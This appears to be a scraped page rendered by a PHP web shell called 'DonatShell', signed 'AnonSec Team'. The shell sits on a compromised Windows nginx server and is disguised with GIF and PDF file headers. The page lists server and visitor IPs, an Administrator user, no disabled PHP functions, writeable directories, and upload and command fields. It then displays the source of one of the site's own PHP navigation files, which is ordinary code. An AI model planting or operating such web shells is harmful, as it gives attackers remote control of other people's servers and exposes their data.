GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/common/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/common/pageHeader_topnav.phpinc
<?
// common/pageHeader_topnav.phpinc
// include_purpose.

t_Begin(); // Begin TRACKing pageHeader_topnav.phpinc.
#d_Line('','/');

//  Load nav_top (Loads first nav_top.phpinc found starting in the current directory and working up to the root directory).
$currentDirectory = dirname($_SERVER['SCRIPT_FILENAME']);
d_Var('$currentDirectory',$currentDirectory);
d_Var("\$_SESSION['ROOT']['directory']",$_SESSION['ROOT']['directory']);
?>
<nav id="topnav"><!-- BEGIN top nav bar -->
<?
$nav_top_not_found = true;
while ( $nav_top_not_found ) {
	if (file_exists($currentDirectory."/nav_top.phpinc")) {
		d_Line("$currentDirectory/nav_top.phpinc found.",'a');
		$nav_top_not_found = false;
		require($currentDirectory."/nav_top.phpinc");
	} else {
		d_Line("$currentDirectory/nav_top.phpinc not found.",'e');
		if ( $currentDirectory == $_SESSION['ROOT']['directory'] ) $nav_top_not_found = false;
		d_Var('strrpos',strrpos($currentDirectory,'/'));
		$currentDirectory = substr($currentDirectory,0,strrpos($currentDirectory,'/'));
		d_Var('$currentDirectory',$currentDirectory);
	}
}
?>
</nav> <!-- END top nav bar -->      
<?

t_End(); // End TRACKing pageHeader_topnav.phpinc.
?>

Anon7 - 2022
AnonSec Team